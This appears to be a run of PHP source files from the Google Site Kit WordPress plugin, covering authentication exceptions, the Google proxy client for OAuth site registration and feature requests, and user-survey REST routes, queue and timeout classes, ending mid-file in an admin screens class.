Google\Site_Kit\Core\Authentication\Exception\Google_Proxy_Code_Exception * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication\Exception; use Exception; /** * Exception thrown when Google proxy returns an error accompanied with a temporary access code. * * @since 1.0.0 * @since 1.2.0 Renamed to Google_Proxy_Code_Exception. * @access private * @ignore */ class Google_Proxy_Code_Exception extends Exception { /** * Temporary code for an undelegated proxy token. * * @since 1.109.0 Explicitly declared; previously, it was dynamically declared. * * @var string */ protected $access_code; /** * Constructor. * * @since 1.0.0 * * @param string $message Optional. The exception message. Default empty string. * @param integer $code Optional. The numeric exception code. Default 0. * @param string $access_code Optional. Temporary code for an undelegated proxy token. Default empty string. */ public function __construct( $message = '', $code = 0, $access_code = '' ) { parent::__construct( $message, $code ); $this->access_code = $access_code; } /** * Gets the temporary access code for an undelegated proxy token. * * @since 1.0.0 * * @return string Temporary code. */ public function getAccessCode() { return $this->access_code; } } <?php /** * Class Google\Site_Kit\Core\Authentication\Exception\Google_OAuth_Exception * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication\Exception; use Exception; /** * Exception thrown when a Google OAuth response contains an OAuth error. * * @since 1.2.0 * @access private * @ignore */ class Google_OAuth_Exception extends Exception { } <?php /** * Class Google\Site_Kit\Core\Authentication\Exception\Missing_Verification_Exception * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication\Exception; /** * Exception thrown when the a missing verification error is encountered when exchanging the site code. * * @since 1.48.0 * @access private * @ignore */ class Missing_Verification_Exception extends Exchange_Site_Code_Exception { } <?php /** * Class Google\Site_Kit\Core\Authentication\Exception\Exchange_Site_Code_Exception * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication\Exception; use Exception; /** * Exception thrown when exchanging the site code fails. * * @since 1.48.0 * @access private * @ignore */ class Exchange_Site_Code_Exception extends Exception { } <?php /** * Class Google\Site_Kit\Core\Authentication\Exception\Insufficient_Scopes_Exception * * @package Google\Site_Kit\Core\Authentication\Exception * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication\Exception; use Exception; use Google\Site_Kit\Core\Contracts\WP_Errorable; use WP_Error; /** * Exception thrown when authentication scopes are insufficient for a request. * * @since 1.9.0 * @access private * @ignore */ class Insufficient_Scopes_Exception extends Exception implements WP_Errorable { const WP_ERROR_CODE = 'missing_required_scopes'; /** * OAuth scopes that are required but not yet granted. * * @since 1.9.0 * * @var array */ protected $scopes = array(); /** * Constructor. * * @since 1.9.0 * * @param string $message Optional. Exception message. * @param int $code Optional. Exception code. * @param Throwable $previous Optional. Previous exception used for chaining. * @param array $scopes Optional. Scopes that are missing. */ public function __construct( $message = '', $code = 0, $previous = null, $scopes = array() ) { parent::__construct( $message, $code, $previous ); $this->set_scopes( $scopes ); } /** * Sets the missing scopes that raised this exception. * * @since 1.9.0 * * @param array $scopes OAuth scopes that are required but not yet granted. */ public function set_scopes( array $scopes ) { $this->scopes = $scopes; } /** * Gets the missing scopes that raised this exception. * * @since 1.9.0 * * @return array */ public function get_scopes() { return $this->scopes; } /** * Gets the WP_Error representation of this exception. * * @since 1.9.0 * * @return WP_Error */ public function to_wp_error() { return new WP_Error( static::WP_ERROR_CODE, $this->getMessage(), array( 'status' => 403, // Forbidden. 'scopes' => $this->scopes, ) ); } } <?php /** * Class Google\Site_Kit\Core\Authentication\Google_Proxy * * @package Google\Site_Kit\Core\Authentication * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Util\Feature_Flags; use Exception; use Google\Site_Kit\Core\Authentication\Clients\OAuth_Client; use Google\Site_Kit\Core\Storage\User_Options; use Google\Site_Kit\Core\Util\URL; use WP_Error; /** * Class for authentication service. * * @since 1.1.2 * @access private * @ignore */ class Google_Proxy { const PRODUCTION_BASE_URL = 'https://sitekit.withgoogle.com'; const STAGING_BASE_URL = 'https://site-kit-dev.appspot.com'; const DEVELOPMENT_BASE_URL = 'https://site-kit-local.appspot.com'; const OAUTH2_SITE_URI = '/o/oauth2/site/'; const OAUTH2_REVOKE_URI = '/o/oauth2/revoke/'; const OAUTH2_TOKEN_URI = '/o/oauth2/token/'; const OAUTH2_AUTH_URI = '/o/oauth2/auth/'; const OAUTH2_DELETE_SITE_URI = '/o/oauth2/delete-site/'; const SETUP_URI = '/v2/site-management/setup/'; const SETUP_V3_URI = '/v3/site-management/setup/'; const PERMISSIONS_URI = '/site-management/permissions/'; const FEATURES_URI = '/site-management/features/'; const SURVEY_TRIGGER_URI = '/survey/trigger/'; const SURVEY_EVENT_URI = '/survey/event/'; const SUPPORT_LINK_URI = '/support'; const ACTION_EXCHANGE_SITE_CODE = 'googlesitekit_proxy_exchange_site_code'; const ACTION_SETUP = 'googlesitekit_proxy_setup'; const ACTION_SETUP_START = 'googlesitekit_proxy_setup_start'; const ACTION_PERMISSIONS = 'googlesitekit_proxy_permissions'; const ACTION_VERIFY = 'googlesitekit_proxy_verify'; const NONCE_ACTION = 'googlesitekit_proxy_nonce'; const HEADER_REDIRECT_TO = 'Redirect-To'; /** * Plugin context. * * @since 1.1.2 * @var Context */ private $context; /** * Required scopes list. * * @since 1.68.0 * @var array */ private $required_scopes = array(); /** * Google_Proxy constructor. * * @since 1.1.2 * * @param Context $context Plugin context. */ public function __construct( Context $context ) { $this->context = $context; } /** * Sets required scopes to use when the site is registering at proxy. * * @since 1.68.0 * * @param array $scopes List of scopes. */ public function with_scopes( array $scopes ) { $this->required_scopes = $scopes; } /** * Returns the application name: a combination of the namespace and version. * * @since 1.27.0 * * @return string The application name. */ public static function get_application_name() { $platform = self::get_platform(); return $platform . '/google-site-kit/' . GOOGLESITEKIT_VERSION; } /** * Gets the list of features to declare support for when setting up with the proxy. * * @since 1.27.0 * * @return array Array of supported features. */ private function get_supports() { $supports = array( 'credentials_retrieval', 'short_verification_token', ); $home_path = URL::parse( $this->context->get_canonical_home_url(), PHP_URL_PATH ); if ( ! $home_path || '/' === $home_path ) { $supports[] = 'file_verification'; } return $supports; } /** * Returns the setup URL to the authentication proxy. * * @since 1.49.0 * @since 1.71.0 Uses the V2 setup flow by default. * * @param array $query_params Query parameters to include in the URL. * @return string URL to the setup page on the authentication proxy. * * @throws Exception Thrown if called without the required query parameters. */ public function setup_url( array $query_params = array() ) { if ( empty( $query_params['code'] ) ) { throw new Exception( __( 'Missing code parameter for setup URL.', 'google-site-kit' ) ); } if ( empty( $query_params['site_id'] ) && empty( $query_params['site_code'] ) ) { throw new Exception( __( 'Missing site_id or site_code parameter for setup URL.', 'google-site-kit' ) ); } return add_query_arg( $query_params, $this->url( Feature_Flags::enabled( 'setupFlowRefresh' ) ? self::SETUP_V3_URI : self::SETUP_URI ) ); } /** * Conditionally adds the `step` parameter to the passed query parameters, depending on the given error code. * * @since 1.49.0 * * @param array $query_params Query parameters. * @param string $error_code Error code. * @return array Query parameters with `step` included, depending on the error code. */ public function add_setup_step_from_error_code( $query_params, $error_code ) { switch ( $error_code ) { case 'missing_verification': $query_params['step'] = 'verification'; break; case 'missing_delegation_consent': $query_params['step'] = 'delegation_consent'; break; case 'missing_search_console_property': $query_params['step'] = 'search_console_property'; break; } return $query_params; } /** * Returns the permissions URL to the authentication proxy. * * This only returns a URL if the user already has an access token set. * * @since 1.27.0 * * @param Credentials $credentials Credentials instance. * @param array $query_args Optional. Additional query parameters. * @return string URL to the permissions page on the authentication proxy on success, or an empty string on failure. */ public function permissions_url( Credentials $credentials, array $query_args = array() ) { if ( $credentials->has() ) { $creds = $credentials->get(); $query_args['site_id'] = $creds['oauth2_client_id']; } $query_args['application_name'] = rawurlencode( self::get_application_name() ); $query_args['hl'] = $this->context->get_locale( 'user' ); return add_query_arg( $query_args, $this->url( self::PERMISSIONS_URI ) ); } /** * Gets a URL to the proxy with optional path. * * @since 1.1.2 * * @param string $path Optional. Path to append to the base URL. * @return string Complete proxy URL. */ public function url( $path = '' ) { $url = self::PRODUCTION_BASE_URL; if ( defined( 'GOOGLESITEKIT_PROXY_URL' ) ) { $url = $this->sanitize_base_url( GOOGLESITEKIT_PROXY_URL ); } $url = untrailingslashit( $url ); if ( $path && is_string( $path ) ) { $url .= '/' . ltrim( $path, '/' ); } return $url; } /** * Sanitizes the given base URL. * * @since 1.154.0 * * @param string $url Base URL to sanitize. * @return string Sanitized base URL. */ public function sanitize_base_url( $url ) { $allowed_urls = array( self::PRODUCTION_BASE_URL, self::STAGING_BASE_URL, self::DEVELOPMENT_BASE_URL, ); if ( in_array( $url, $allowed_urls, true ) ) { return $url; } // Allow for version-specific URLs to application instances. if ( preg_match( '#^https://(?:\d{8}t\d{6}-dot-)?site-kit(?:-dev|-local)?(?:\.[a-z]{2}\.r)?\.appspot\.com/?$#', $url, $_ ) ) { return $url; } return self::PRODUCTION_BASE_URL; } /** * Sends a POST request to the Google Proxy server. * * @since 1.27.0 * * @param string $uri Endpoint to send the request to. * @param Credentials $credentials Credentials instance. * @param array $args Array of request arguments. * @return array|WP_Error The response as an associative array or WP_Error on failure. */ private function request( $uri, $credentials, array $args = array() ) { $request_args = array( 'headers' => ! empty( $args['headers'] ) && is_array( $args['headers'] ) ? $args['headers'] : array(), 'body' => ! empty( $args['body'] ) && is_array( $args['body'] ) ? $args['body'] : array(), 'timeout' => isset( $args['timeout'] ) ? $args['timeout'] : 15, ); if ( $credentials && $credentials instanceof Credentials ) { if ( ! $credentials->has() ) { return new WP_Error( 'oauth_credentials_not_exist', __( 'OAuth credentials haven\'t been found.', 'google-site-kit' ), array( 'status' => 401 ) ); } $creds = $credentials->get(); $request_args['body']['site_id'] = $creds['oauth2_client_id']; $request_args['body']['site_secret'] = $creds['oauth2_client_secret']; } if ( ! empty( $args['access_token'] ) && is_string( $args['access_token'] ) ) { $request_args['headers']['Authorization'] = 'Bearer ' . $args['access_token']; } if ( isset( $args['mode'] ) && 'async' === $args['mode'] ) { $request_args['timeout'] = 0.01; $request_args['blocking'] = false; } if ( ! empty( $args['json_request'] ) ) { $request_args['headers']['Content-Type'] = 'application/json'; $request_args['body'] = wp_json_encode( $request_args['body'] ); } $url = $this->url( $uri ); $response = wp_remote_post( $url, $request_args ); if ( is_wp_error( $response ) ) { return $response; } $code = wp_remote_retrieve_response_code( $response ); $body = wp_remote_retrieve_body( $response ); $body = json_decode( $body, true ); if ( $code < 200 || 299 < $code ) { $message = ''; $error_code = 'request_failed'; if ( is_array( $body ) ) { if ( ! empty( $body['error'] ) ) { $message = $body['error']; } if ( ! empty( $body['error_code'] ) ) { $error_code = $body['error_code']; } } return new WP_Error( $error_code, $message, array( 'status' => $code ) ); } if ( ! empty( $args['return'] ) && 'response' === $args['return'] ) { return $response; } if ( is_null( $body ) ) { return new WP_Error( 'failed_to_parse_response', __( 'Failed to parse response.', 'google-site-kit' ), array( 'status' => 500 ) ); } return $body; } /** * Gets site fields. * * @since 1.5.0 * * @return array Associative array of $query_arg => $value pairs. */ public function get_site_fields() { return array( 'name' => wp_specialchars_decode( get_bloginfo( 'name' ), ENT_QUOTES ), 'url' => $this->context->get_canonical_home_url(), 'redirect_uri' => add_query_arg( 'oauth2callback', 1, admin_url( 'index.php' ) ), 'action_uri' => admin_url( 'index.php' ), 'return_uri' => admin_url( 'plugins.php' ), 'analytics_redirect_uri' => add_query_arg( 'gatoscallback', 1, admin_url( 'index.php' ) ), ); } /** * Gets metadata fields. * * @since 1.68.0 * * @return array Metadata fields array. */ public function get_metadata_fields() { $metadata = array( 'supports' => implode( ' ', $this->get_supports() ), 'nonce' => wp_create_nonce( self::NONCE_ACTION ), 'mode' => '', 'hl' => $this->context->get_locale( 'user' ), 'application_name' => self::get_application_name(), 'service_version' => 'v2', ); if ( Feature_Flags::enabled( 'setupFlowRefresh' ) ) { $metadata['service_version'] = 'v3'; } /** * Filters the setup mode. * * @since 1.68.0 * * @param string $mode An initial setup mode. */ $metadata['mode'] = apply_filters( 'googlesitekit_proxy_setup_mode', $metadata['mode'] ); return $metadata; } /** * Gets user fields. * * @since 1.10.0 * * @return array Associative array of $query_arg => $value pairs. */ public function get_user_fields() { $user_roles = wp_get_current_user()->roles; // If multisite, also consider network administrators. if ( is_multisite() && current_user_can( 'manage_network' ) ) { $user_roles[] = 'network_administrator'; } $user_roles = array_unique( $user_roles ); return array( 'user_roles' => implode( ',', $user_roles ), ); } /** * Unregisters the site on the proxy. * * @since 1.20.0 * * @param Credentials $credentials Credentials instance. * @return array|WP_Error Response data on success, otherwise WP_Error object. */ public function unregister_site( Credentials $credentials ) { return $this->request( self::OAUTH2_DELETE_SITE_URI, $credentials ); } /** * Registers the site on the proxy. * * @since 1.68.0 * * @param string $mode Sync mode. * @return string|WP_Error Redirect URL on success, otherwise an error. */ public function register_site( $mode = 'async' ) { return $this->send_site_fields( null, $mode ); } /** * Synchronizes site fields with the proxy. * * @since 1.5.0 * @since 1.68.0 Updated the function to return redirect URL. * * @param Credentials $credentials Credentials instance. * @param string $mode Sync mode. * @return string|WP_Error Redirect URL on success, otherwise an error. */ public function sync_site_fields( Credentials $credentials, $mode = 'async' ) { return $this->send_site_fields( $credentials, $mode ); } /** * Sends site fields to the proxy. * * @since 1.68.0 * * @param Credentials $credentials Credentials instance. * @param string $mode Sync mode. * @return string|WP_Error Redirect URL on success, otherwise an error. */ private function send_site_fields( ?Credentials $credentials = null, $mode = 'async' ) { $response = $this->request( self::OAUTH2_SITE_URI, $credentials, array( 'return' => 'response', 'mode' => $mode, 'body' => array_merge( $this->get_site_fields(), $this->get_user_fields(), $this->get_metadata_fields(), array( 'scope' => implode( ' ', $this->required_scopes ), ) ), ) ); if ( is_wp_error( $response ) ) { return $response; } $redirect_to = wp_remote_retrieve_header( $response, self::HEADER_REDIRECT_TO ); if ( empty( $redirect_to ) ) { return new WP_Error( 'failed_to_retrive_redirect', __( 'Failed to retrieve redirect URL.', 'google-site-kit' ), array( 'status' => 500 ) ); } return $redirect_to; } /** * Exchanges a site code for client credentials from the proxy. * * @since 1.1.2 * * @param string $site_code Site code identifying the site. * @param string $undelegated_code Undelegated code identifying the undelegated token. * @return array|WP_Error Response data containing site_id and site_secret on success, WP_Error object on failure. */ public function exchange_site_code( $site_code, $undelegated_code ) { $response_data = $this->request( self::OAUTH2_SITE_URI, null, array( 'body' => array( 'code' => $undelegated_code, 'site_code' => $site_code, ), ) ); if ( is_wp_error( $response_data ) ) { return $response_data; } if ( ! isset( $response_data['site_id'], $response_data['site_secret'] ) ) { return new WP_Error( 'oauth_credentials_not_exist', __( 'OAuth credentials haven\'t been found.', 'google-site-kit' ), array( 'status' => 401 ) ); } return $response_data; } /** * Gets remote features. * * @since 1.27.0 * @since 1.104.0 Added `php_version` to request. * @since 1.167.0 Added `amp_mode` to request. * * @param Credentials $credentials Credentials instance. * @return array|WP_Error Response of the wp_remote_post request. */ public function get_features( Credentials $credentials ) { global $wp_version; $platform = self::get_platform(); $user_count = count_users(); $connectable_user_count = isset( $user_count['avail_roles']['administrator'] ) ? $user_count['avail_roles']['administrator'] : 0; $amp_mode = $this->context->get_amp_mode(); $body = array( 'platform' => $platform . '/google-site-kit', 'version' => GOOGLESITEKIT_VERSION, 'platform_version' => $wp_version, 'php_version' => phpversion(), 'user_count' => $user_count['total_users'], 'connectable_user_count' => $connectable_user_count, 'connected_user_count' => $this->count_connected_users(), 'amp_mode' => $amp_mode ? $amp_mode : '', ); /** * Filters additional context data sent with the body of a remote-controlled features request. * * @since 1.71.0 * * @param array $body Context data to be sent with the features request. */ $body = apply_filters( 'googlesitekit_features_request_data', $body ); return $this->request( self::FEATURES_URI, $credentials, array( 'body' => $body ) ); } /** * Gets the number of users who are connected (i.e. authenticated / * have an access token). * * @since 1.71.0 * * @return int Number of WordPress user accounts connected to SiteKit. */ public function count_connected_users() { $user_options = new User_Options( $this->context ); $connected_users = get_users( array( 'meta_key' => $user_options->get_meta_key( OAuth_Client::OPTION_ACCESS_TOKEN ), // phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_key 'meta_compare' => 'EXISTS', 'role' => 'administrator', 'fields' => 'ID', ) ); return count( $connected_users ); } /** * Gets the platform. * * @since 1.37.0 * * @return string WordPress multisite or WordPress. */ public static function get_platform() { if ( is_multisite() ) { return 'wordpress-multisite'; } return 'wordpress'; // phpcs:ignore WordPress.WP.CapitalPDangit.MisspelledInText } /** * Sends survey trigger ID to the proxy. * * @since 1.35.0 * * @param Credentials $credentials Credentials instance. * @param string $access_token Access token. * @param string $trigger_id Token ID. * @return array|WP_Error Response of the wp_remote_post request. */ public function send_survey_trigger( Credentials $credentials, $access_token, $trigger_id ) { return $this->request( self::SURVEY_TRIGGER_URI, $credentials, array( 'access_token' => $access_token, 'json_request' => true, 'body' => array( 'trigger_context' => array( 'trigger_id' => $trigger_id, 'language' => get_user_locale(), ), ), ) ); } /** * Sends survey event to the proxy. * * @since 1.35.0 * * @param Credentials $credentials Credentials instance. * @param string $access_token Access token. * @param array|\stdClass $session Session object. * @param array|\stdClass $event Event object. * @return array|WP_Error Response of the wp_remote_post request. */ public function send_survey_event( Credentials $credentials, $access_token, $session, $event ) { return $this->request( self::SURVEY_EVENT_URI, $credentials, array( 'access_token' => $access_token, 'json_request' => true, 'body' => array( 'session' => $session, 'event' => $event, ), ) ); } } <?php /** * Class Google\Site_Kit\Core\User_Surveys\REST_User_Surveys_Controller * * @package Google\Site_Kit\Core\User_Surveys * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User_Surveys; use Google\Site_Kit\Core\Authentication\Authentication; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use WP_Error; use WP_REST_Request; use WP_REST_Response; use WP_REST_Server; /** * Class for handling user survey rest routes. * * @since 1.35.0 * @access private * @ignore */ class REST_User_Surveys_Controller { /** * Authentication instance. * * @since 1.35.0 * @var Authentication */ protected $authentication; /** * Survey_Timeouts instance. * * @since 1.73.0 * @var Survey_Timeouts */ protected $timeouts; /** * Survey_Queue instance. * * @since 1.98.0 * @var Survey_Queue */ protected $queue; /** * Constructor. * * @since 1.35.0 * * @param Authentication $authentication Authentication instance. * @param Survey_Timeouts $timeouts User timeouts setting. * @param Survey_Queue $queue Surveys queue. */ public function __construct( Authentication $authentication, Survey_Timeouts $timeouts, Survey_Queue $queue ) { $this->authentication = $authentication; $this->timeouts = $timeouts; $this->queue = $queue; } /** * Registers functionality through WordPress hooks. * * @since 1.35.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $paths ) { return array_merge( $paths, array( '/' . REST_Routes::REST_ROOT . '/core/user/data/survey-timeouts', ) ); } ); } /** * Gets REST route instances. * * @since 1.35.0 * * @return REST_Route[] List of REST_Route objects. */ protected function get_rest_routes() { $can_authenticate = function () { return $this->authentication->is_authenticated() && $this->authentication->credentials()->using_proxy(); }; return array( 'survey-trigger' => new REST_Route( 'core/user/data/survey-trigger', array( 'methods' => WP_REST_Server::CREATABLE, 'callback' => function ( WP_REST_Request $request ) { $proxy = $this->authentication->get_google_proxy(); $creds = $this->authentication->credentials(); $access_token = (string) $this->authentication->get_oauth_client()->get_access_token(); $data = $request->get_param( 'data' ); $response = $proxy->send_survey_trigger( $creds, $access_token, $data['triggerID'] ); if ( ! is_wp_error( $response ) && ! empty( $response['survey_id'] ) ) { $this->queue->enqueue( $response ); } if ( ! is_wp_error( $response ) && ! empty( $data['ttl'] ) ) { $ttl = intval( $data['ttl'] ); if ( $ttl > 0 ) { $this->timeouts->add( $data['triggerID'], $ttl ); } } return new WP_REST_Response( array( 'success' => true ) ); }, 'permission_callback' => $can_authenticate, 'args' => array( 'data' => array( 'type' => 'object', 'required' => true, 'properties' => array( 'triggerID' => array( 'type' => 'string', 'required' => true, ), 'ttl' => array( 'type' => 'integer', 'minimum' => 0, ), ), ), ), ) ), 'survey-event' => new REST_Route( 'core/user/data/survey-event', array( 'methods' => WP_REST_Server::CREATABLE, 'callback' => function ( WP_REST_Request $request ) { $proxy = $this->authentication->get_google_proxy(); $creds = $this->authentication->credentials(); $access_token = (string) $this->authentication->get_oauth_client()->get_access_token(); $data = $request->get_param( 'data' ); if ( isset( $data['event']['survey_shown'] ) ) { $this->timeouts->set_global_timeout(); } $response = $proxy->send_survey_event( $creds, $access_token, $data['session'], $data['event'] ); if ( ! is_wp_error( $response ) ) { $is_survey_closed = isset( $data['event']['survey_closed'] ); $is_completion_shown = isset( $data['event']['completion_shown'] ); if ( $is_completion_shown || $is_survey_closed ) { $survey = $this->queue->find_by_session( $data['session'] ); if ( ! empty( $survey ) ) { $this->queue->dequeue( $survey['survey_id'] ); } } } return new WP_REST_Response( $response ); }, 'permission_callback' => $can_authenticate, 'args' => array( 'data' => array( 'type' => 'object', 'required' => true, 'properties' => array( 'session' => array( 'type' => 'object', 'required' => true, 'properties' => array( 'session_id' => array( 'type' => 'string', 'required' => true, ), 'session_token' => array( 'type' => 'string', 'required' => true, ), ), ), 'event' => array( 'type' => 'object', 'required' => true, 'properties' => array( 'survey_shown' => array( 'type' => 'object', ), 'survey_closed' => array( 'type' => 'object', ), 'question_answered' => array( 'type' => 'object', ), 'completion_shown' => array( 'type' => 'object', ), 'follow_up_link_clicked' => array( 'type' => 'object', ), ), ), ), ), ), ) ), 'survey-timeouts' => new REST_Route( 'core/user/data/survey-timeouts', array( 'methods' => WP_REST_Server::READABLE, 'permission_callback' => $can_authenticate, 'callback' => function () { return new WP_REST_Response( $this->timeouts->get_survey_timeouts() ); }, ) ), 'survey' => new REST_Route( 'core/user/data/survey', array( 'methods' => WP_REST_Server::READABLE, 'permission_callback' => $can_authenticate, 'callback' => function () { return new WP_REST_Response( array( 'survey' => $this->queue->front(), ) ); }, ) ), ); } } <?php /** * Class Google\Site_Kit\Core\User_Surveys\User_Surveys * * @package Google\Site_Kit\Core\User_Surveys * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User_Surveys; use Google\Site_Kit\Core\Authentication\Authentication; use Google\Site_Kit\Core\Storage\User_Options; /** * Class for handling user surveys. * * @since 1.73.0 * @access private * @ignore */ class User_Surveys { /** * Survey_Timeouts instance. * * @since 1.73.0 * @var Survey_Timeouts */ protected $survey_timeouts; /** * REST_User_Surveys_Controller instance. * * @since 1.73.0 * @var REST_User_Surveys_Controller */ protected $rest_controller; /** * Constructor. * * @since 1.73.0 * * @param Authentication $authentication Authentication instance. * @param User_Options $user_options User option API. * @param Survey_Queue $survey_queue Optional. Survey_Queue instance. Default a new instance. */ public function __construct( Authentication $authentication, User_Options $user_options, Survey_Queue $survey_queue ) { $this->survey_timeouts = new Survey_Timeouts( $user_options ); $this->rest_controller = new REST_User_Surveys_Controller( $authentication, $this->survey_timeouts, $survey_queue ?: new Survey_Queue( $user_options ) ); } /** * Registers functionality through WordPress hooks. * * @since 1.73.0 */ public function register() { $this->survey_timeouts->register(); $this->rest_controller->register(); } } <?php /** * Class Google\Site_Kit\Core\User_Surveys\Survey_Timeouts * * @package Google\Site_Kit\Core\User_Surveys * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User_Surveys; use Google\Site_Kit\Core\Storage\User_Setting; use Google\Site_Kit\Core\Storage\Setting\List_Setting; /** * Class for representing user survey timeouts. * * @since 1.73.0 * @access private * @ignore */ class Survey_Timeouts extends User_Setting { use List_Setting; const OPTION = 'googlesitekit_survey_timeouts'; const GLOBAL_KEY = '__global'; /** * Adds a timeout for the provided survey. * * @since 1.73.0 * * @param string $survey Survey name. * @param int $timeout Tiemout for the survey. */ public function add( $survey, $timeout ) { $surveys = $this->get(); $surveys[ $survey ] = time() + $timeout; $this->set( $surveys ); } /** * Gets survey timeouts. * * @since 1.73.0 * * @return array Survey timeouts array. */ public function get_survey_timeouts() { $surveys = $this->get(); $surveys = $this->sanitize_list_items( $surveys ); return array_keys( $surveys ); } /** * Sets the global timeout to twelve hours. * * @since 1.98.0 */ public function set_global_timeout() { $this->add( self::GLOBAL_KEY, 12 * HOUR_IN_SECONDS ); } /** * Sanitizes survey timeouts. * * @since 1.73.0 * * @param array $items Survey timeouts list. * @return array Filtered survey timeouts. */ protected function sanitize_list_items( $items ) { $surveys = array(); if ( is_array( $items ) ) { foreach ( $items as $item => $ttl ) { if ( $ttl > time() ) { $surveys[ $item ] = $ttl; } } } return $surveys; } } <?php /** * Class Google\Site_Kit\Core\User_Surveys\Survey_Queue * * @package Google\Site_Kit\Core\User_Surveys * @copyright 2023 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User_Surveys; use Google\Site_Kit\Core\Storage\User_Setting; use Google\Site_Kit\Core\Storage\Setting\List_Setting; /** * Class for handling surveys queue. * * @since 1.98.0 * @access private * @ignore */ class Survey_Queue extends User_Setting { use List_Setting; const OPTION = 'googlesitekit_survey_queue'; /** * Adds a new survey to the queue. * * @since 1.98.0 * * @param array $survey { * The survey object to add to the queue. * * @type string $survey_id Survey ID. * @type array $survey_payload Survey payload that describe survey questions and available completions. * @type array $session Session object that contains session ID and session token. * } * @return bool TRUE if the survey has been added to the queue, otherwise FALSE. */ public function enqueue( $survey ) { $surveys = $this->get(); // Do not add the survey if it is already in the queue. foreach ( $surveys as $item ) { if ( $item['survey_id'] === $survey['survey_id'] ) { return false; } } $surveys[] = $survey; $this->set( $surveys ); return true; } /** * Dequeues a survey that has the provided survey ID. * * @since 1.98.0 * * @param string $survey_id The survey ID to dequeue. * @return array|null A survey object if it has been found, otherwise NULL. */ public function dequeue( $survey_id ) { $survey = null; // Search for the requested survey_id. $old_surveys = $this->get(); $new_surveys = array(); foreach ( $old_surveys as $item ) { if ( $item['survey_id'] === $survey_id ) { $survey = $item; } else { $new_surveys[] = $item; } } // Update existing surveys list if we have found the survey we need to dequeue. if ( ! is_null( $survey ) ) { $this->set( $new_surveys ); } return $survey; } /** * Gets the first survey in the queue without removing it from the queue. * * @since 1.98.0 * * @return array|null A survey object if at least one survey exists in the queue, otherwise NULL. */ public function front() { $surveys = $this->get(); return reset( $surveys ) ?: null; } /** * Gets the survey for the provided session. * * @since 1.98.0 * * @param array $session { * The current session object. * * @type string $session_id Session ID. * @type string $session_token Session token. * } * @return array|null A survey object if it has been found for the session, otherwise NULL. */ public function find_by_session( $session ) { $surveys = $this->get(); foreach ( $surveys as $survey ) { if ( ! empty( $survey['session']['session_id'] ) && ! empty( $session['session_id'] ) && $survey['session']['session_id'] === $session['session_id'] ) { return $survey; } } return null; } /** * Sanitizes array items. * * @since 1.98.0 * * @param array $items The original array items. * @return array Filtered items. */ protected function sanitize_list_items( $items ) { return $items; } } <?php /** * Class Google\Site_Kit\Core\Admin\Available_Tools * * @package Google\Site_Kit\Core\Admin * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Admin; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; use Google\Site_Kit\Core\Util\Reset; /** * Class for extending available tools for Site Kit. * * @since 1.30.0 * @access private * @ignore */ class Available_Tools { use Method_Proxy_Trait; /** * Registers functionality through WordPress hooks. * * @since 1.30.0 */ public function register() { add_action( 'tool_box', $this->get_method_proxy( 'render_tool_box' ) ); } /** * Renders tool box output. * * @since 1.30.0 */ private function render_tool_box() { if ( ! current_user_can( Permissions::SETUP ) ) { return; } ?> <div class="card"> <h2 class="title"><?php esc_html_e( 'Reset Site Kit', 'google-site-kit' ); ?></h2> <p> <?php esc_html_e( 'Resetting will disconnect all users and remove all Site Kit settings and data within WordPress. You and any other users who wish to use Site Kit will need to reconnect to restore access.', 'google-site-kit' ) ?> </p> <p> <a class="button button-primary" href="<?php echo esc_url( Reset::url() ); ?>" > <?php esc_html_e( 'Reset Site Kit', 'google-site-kit' ); ?> </a> </p> </div> <?php } } <?php /** * Class Google\Site_Kit\Core\Admin\Screens * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Admin; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Assets\Assets; use Google\Site_Kit\Core\Authentication\Authentication; use Google\Site_Kit\Core\Dismissals\Dismissed_Items; use Google\Site_Kit\Core\Key_Metrics\Key_Metrics_Setup_Completed_By; use Google\Site_Kit\Core\Modules\Modules; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Storage\User_Options; use 